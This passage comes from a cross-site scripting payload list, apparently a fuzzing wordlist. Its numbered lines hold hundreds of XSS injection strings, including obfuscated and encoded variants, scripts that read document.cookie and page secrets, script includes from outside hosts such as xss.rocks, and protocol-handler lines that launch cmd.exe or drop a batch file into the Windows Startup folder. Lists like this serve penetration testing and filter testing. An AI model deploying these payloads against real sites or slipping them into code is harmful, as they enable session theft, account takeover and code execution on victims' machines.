name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
|
348
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
349
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
350
|
+
<body onLoad="alert('XSS');"
|
|
351
|
+
<body onunload="javascript:alert('XSS');">
|
|
352
|
+
<body/onload=<!-->
alert(1)>
|
|
353
|
+
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
|
354
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
355
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
356
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
|
357
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
|
358
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
359
|
+
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
|
360
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
361
|
+
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
|
362
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
363
|
+
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
|
364
|
+
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
365
|
+
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
366
|
+
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
367
|
+
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
368
|
+
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
369
|
+
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
|
370
|
+
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
|
371
|
+
<iframe src=http://xss.rocks/scriptlet.html <
|
|
372
|
+
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
373
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
374
|
+
<iframe/onreadystatechange=alert(1)
|
|
375
|
+
<iframe/src \/\/onload = prompt(1)
|
|
376
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
|
377
|
+
<IMG onmouseover="alert('xxs')">
|
|
378
|
+
<img src ?itworksonchrome?\/onerror = alert(1)???
|
|
379
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
|
380
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
381
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
382
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
383
|
+
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
|
384
|
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
|
385
|
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
|
386
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
387
|
+
<img src="javascript:alert('XSS')">
|
|
388
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
389
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
390
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
391
|
+
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
|
392
|
+
<IMG SRC=java%00script:alert(\"XSS\")>
|
|
393
|
+
<img src=x onerror="javascript:alert('XSS')">
|
|
394
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
395
|
+
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
|
396
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
397
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
398
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
|
399
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
|
400
|
+
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
|
401
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
|
402
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
403
|
+
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
404
|
+
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
|
405
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
|
406
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
407
|
+
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
|
408
|
+
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
|
409
|
+
<script x> alert(1) </script 1=2
|
|
410
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
411
|
+
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
412
|
+
<script/src=data:text/javascript,alert(1)></script> ?
|
|
413
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
|
414
|
+
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
415
|
+
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
|
416
|
+
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
|
417
|
+
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
|
418
|
+
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
|
419
|
+
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
|
420
|
+
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
|
421
|
+
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
|
422
|
+
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
|
423
|
+
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
|
424
|
+
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
|
425
|
+
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
|
426
|
+
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
|
427
|
+
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
|
428
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
429
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
430
|
+
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
|
431
|
+
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
|
432
|
+
<script>alert(document.head.childNodes[3].text)</script>
|
|
433
|
+
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
|
434
|
+
<script>alert('XSS');</script>
|
|
435
|
+
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
436
|
+
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
437
|
+
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
|
438
|
+
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
|
439
|
+
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
|
440
|
+
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
|
441
|
+
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
|
442
|
+
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
|
443
|
+
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
|
444
|
+
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
|
445
|
+
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
|
446
|
+
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
|
447
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
448
|
+
<svg/onload=alert(1)
|
|
449
|
+
<svg><script ?>alert(1)
|
|
450
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
451
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
452
|
+
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
|
453
|
+
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
|
454
|
+
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
|
455
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
|
456
|
+
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
|
457
|
+
alert
|
|
458
|
+
alert(1)
|
|
459
|
+
alert(1)
|
|
460
|
+
alert\\`1\\`
|
|
461
|
+
alert`1`
|
|
462
|
+
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
|
463
|
+
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
464
|
+
http://www.<script>alert(1)</script .com
|
|
465
|
+
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
466
|
+
javascript:alert%28/xss/%29
|
|
467
|
+
javascript:alert(1)
|
|
468
|
+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
|
469
|
+
x”</title><img src%3dx onerror%3dalert(1)>
|
|
470
|
+
[[#%3Cscript%3Ealert(1)%3C/script%3E|
|
|
471
|
+
a{b:`function(){alert(1)}()`;}
|
|
472
|
+
"><style type=text/less>a{b:`function(){alert(1)}()`;}</style>
|
|
473
|
+
<SCRIPT>alert('XSS');</SCRIPT>
|
|
474
|
+
'';!--"<XSS>=&{()}
|
|
475
|
+
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
|
|
476
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
477
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
478
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
479
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
480
|
+
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
481
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
482
|
+
SRC=
<IMG 6;avascript:alert('XSS')>
|
|
483
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
|
484
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
485
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
486
|
+
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
|
|
487
|
+
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
|
|
488
|
+
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
489
|
+
<SCRIPT SRC=http://xss.rocks/xss.js?<B>
|
|
490
|
+
<SCRIPT>a=/XSS/
|
|
491
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
492
|
+
<BODY ONLOAD=alert('XSS')>
|
|
493
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
|
494
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
|
495
|
+
<BGSOUND SRC="javascript:alert('XSS');">
|
|
496
|
+
<BR SIZE="&{alert('XSS')}">
|
|
497
|
+
<LAYER SRC="http://xss.rocks/scriptlet.html"></LAYER>
|
|
498
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
499
|
+
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
|
|
500
|
+
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
|
|
501
|
+
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
|
|
502
|
+
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
|
|
503
|
+
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
504
|
+
<IMG SRC="mocha:[code]">
|
|
505
|
+
<IMG SRC="livescript:[code]">
|
|
506
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
507
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
508
|
+
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
|
509
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
510
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
511
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
512
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
513
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
514
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
515
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
516
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
517
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
518
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
519
|
+
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
|
520
|
+
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
521
|
+
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
522
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
523
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
|
|
524
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
525
|
+
getURL("javascript:alert('XSS')")
|
|
526
|
+
a="get";
|
|
527
|
+
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
|
528
|
+
<XML SRC="http:/xss.rocks/xsstest.xml" ID=I></XML>
|
|
529
|
+
<HTML><BODY>
|
|
530
|
+
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
|
531
|
+
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'"-->
|
|
532
|
+
<? echo('<SCR)';
|
|
533
|
+
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
534
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
535
|
+
<SCRIPT a=">" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
536
|
+
<SCRIPT a=">" '' SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
537
|
+
<SCRIPT "a='>'" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
538
|
+
<SCRIPT a=`>` SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
539
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="xss.rocks/xss.js"></SCRIPT>
|
|
540
|
+
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
|
541
|
+
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
|
542
|
+
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
|
543
|
+
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
|
544
|
+
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
|
545
|
+
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
|
546
|
+
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
|
547
|
+
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
548
|
+
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
549
|
+
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
|
|
550
|
+
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
|
551
|
+
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
|
552
|
+
<input onfocus=write(1) autofocus>
|
|
553
|
+
<input onblur=write(1) autofocus><input autofocus>
|
|
554
|
+
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
|
555
|
+
<video poster=javascript:alert(1)//></video>
|
|
556
|
+
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
|
557
|
+
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
|
558
|
+
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
|
559
|
+
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
|
560
|
+
<script>({0:#0=alert/#0#/#0#(0)})</script>
|
|
561
|
+
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
|
562
|
+
<?xml-stylesheet href="javascript:alert(1)"?><root/>
|
|
563
|
+
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
|
564
|
+
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
|
565
|
+
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
|
566
|
+
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
|
567
|
+
<input onblur=focus() autofocus><input>
|
|
568
|
+
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
|
569
|
+
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
|
570
|
+
<script src="#">{alert(1)}</script>;1
|
|
571
|
+
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
|
572
|
+
